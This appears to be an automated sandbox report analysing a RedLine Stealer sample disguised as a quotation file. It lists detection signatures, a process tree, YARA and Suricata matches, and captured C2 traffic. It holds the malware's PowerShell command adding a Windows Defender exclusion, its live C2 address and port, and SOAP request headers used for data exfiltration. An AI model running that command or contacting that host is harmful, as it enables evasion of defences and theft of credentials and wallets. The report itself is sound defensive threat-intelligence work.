Edit tour

Windows Analysis Report
QUOTATION#09678.exe

Overview

General Information

Sample name:	QUOTATION#09678.exe
Analysis ID:	1554625
MD5:	9e31f4b7387356ccdc3678a82846f465
SHA1:	f6ef33bc5656e5deb925b2a67574ca6f32ca50e3
SHA256:	2fe5891237c7a50d9ac1d09261e2c6d44098763af1ccc6062531ad31474eba36
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected RedLine Stealer

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Disables UAC (registry)

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION#09678.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\QUOTATION#09678.exe" MD5: 9E31F4B7387356CCDC3678A82846F465)

powershell.exe (PID: 7516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8028 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

RegSvcs.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7572 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 7756 cmdline: C:\Windows\system32\WerFault.exe -u -p 6704 -s 1332 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["193.70.111.186:13484"], "Bot Id": "hyce"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000002.1534868693.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1686865250.000001D8CBDE5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x2bf02:$a4: get_ScannedWallets 0x43d4a:$a4: get_ScannedWallets 0x2ad60:$a5: get_ScanTelegram 0x42ba8:$a5: get_ScanTelegram 0x2bb86:$a6: get_ScanGeckoBrowsersPaths 0x439ce:$a6: get_ScanGeckoBrowsersPaths 0x299a2:$a7: <Processes>k__BackingField 0x417ea:$a7: <Processes>k__BackingField 0x278b4:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3f6fc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x292d6:$a9: <ScanFTP>k__BackingField 0x4111e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: QUOTATION#09678.exe PID: 6704	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QUOTATION#09678.exe PID: 6704	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: QUOTATION#09678.exe PID: 6704	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: QUOTATION#09678.exe PID: 6704	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: QUOTATION#09678.exe PID: 6704	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x4e82d:$a4: get_ScannedWallets 0x4d6d4:$a5: get_ScanTelegram 0x4e4b6:$a6: get_ScanGeckoBrowsersPaths 0x4c367:$a7: <Processes>k__BackingField 0x4989a:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x4bc9b:$a9: <ScanFTP>k__BackingField
Process Memory Space: RegSvcs.exe PID: 7564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7564	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7564	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x282b83:$a4: get_ScannedWallets 0x281a2a:$a5: get_ScanTelegram 0x28280c:$a6: get_ScanGeckoBrowsersPaths 0x2806bd:$a7: <Processes>k__BackingField 0x27dbf0:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x27fff1:$a9: <ScanFTP>k__BackingField
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.QUOTATION#09678.exe.1d8cbe15780.11.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
11.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
11.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.QUOTATION#09678.exe.1d8cbdfd938.9.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b412:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a270:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b096:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28eb2:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26dc4:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287e6:$a9: <ScanFTP>k__BackingField
0.2.QUOTATION#09678.exe.1d8cbdfd938.9.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282d2:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b989:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f78:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2aec1:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x284d3:$v2_2: get_ScanVPN 0x28576:$v2_2: get_ScanFTP
0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.QUOTATION#09678.exe.1d8cbe15780.11.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#09678.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#09678.exe, ParentProcessId: 6704, ParentProcessName: QUOTATION#09678.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, ProcessId: 7516, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#09678.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#09678.exe, ParentProcessId: 6704, ParentProcessName: QUOTATION#09678.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, ProcessId: 7516, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T18:45:22.261325+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.7	49716	TCP
2024-11-12T18:46:02.372584+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.7	49956	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T18:45:25.329488+0100	2045000	1	Malware Command and Control Activity Detected	193.70.111.186	13484	192.168.2.7	49715	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T18:45:29.802238+0100	2046056	1	A Network Trojan was detected	193.70.111.186	13484	192.168.2.7	49715	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T18:45:29.802238+0100	2045001	1	Malware Command and Control Activity Detected	193.70.111.186	13484	192.168.2.7	49715	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T18:45:20.316660+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.7	49715	193.70.111.186	13484	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T18:45:26.418493+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.7	49715	193.70.111.186	13484	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T18:45:32.040757+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.7	49790	193.70.111.186	13484	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T18:45:29.861078+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.7	49779	193.70.111.186	13484	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 11.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["193.70.111.186:13484"], "Bot Id": "hyce"}

Multi AV Scanner detection for submitted file

Source: QUOTATION#09678.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: QUOTATION#09678.exe

Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.1680211636.000001D8B9585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION#09678.exe PID: 6704, type: MEMORYSTR

Source: QUOTATION#09678.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdbRSDS source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb??\p source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdbMZ source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdbH source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.pdbH source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb) source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WEREC11.tmp.dmp.16.dr

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 4x nop then jmp 00007FFAAC7B2D02h		0_2_00007FFAAC7B2AB5
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 4x nop then jmp 00007FFAAC7B3E8Ch		0_2_00007FFAAC7B3C81

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.7:49715 -> 193.70.111.186:13484
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 193.70.111.186:13484 -> 192.168.2.7:49715
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.7:49715 -> 193.70.111.186:13484
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 193.70.111.186:13484 -> 192.168.2.7:49715
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 193.70.111.186:13484 -> 192.168.2.7:49715
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.7:49779 -> 193.70.111.186:13484
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.7:49790 -> 193.70.111.186:13484

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 193.70.111.186:13484

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 13484
Source: unknown	Network traffic detected: HTTP traffic on port 13484 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 13484
Source: unknown	Network traffic detected: HTTP traffic on port 13484 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 13484
Source: unknown	Network traffic detected: HTTP traffic on port 13484 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 13484
Source: unknown	Network traffic detected: HTTP traffic on port 13484 -> 49790

Source: global traffic

TCP traffic: 192.168.2.7:49715 -> 193.70.111.186:13484

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 193.70.111.186:13484Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 193.70.111.186:13484Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 193.70.111.186:13484Content-Length: 929464Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 193.70.111.186:13484Content-Length: 929456Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49956
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49716

Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
Source: unknown	TCP traffic detected without corresponding DNS query: 193.70.111.186
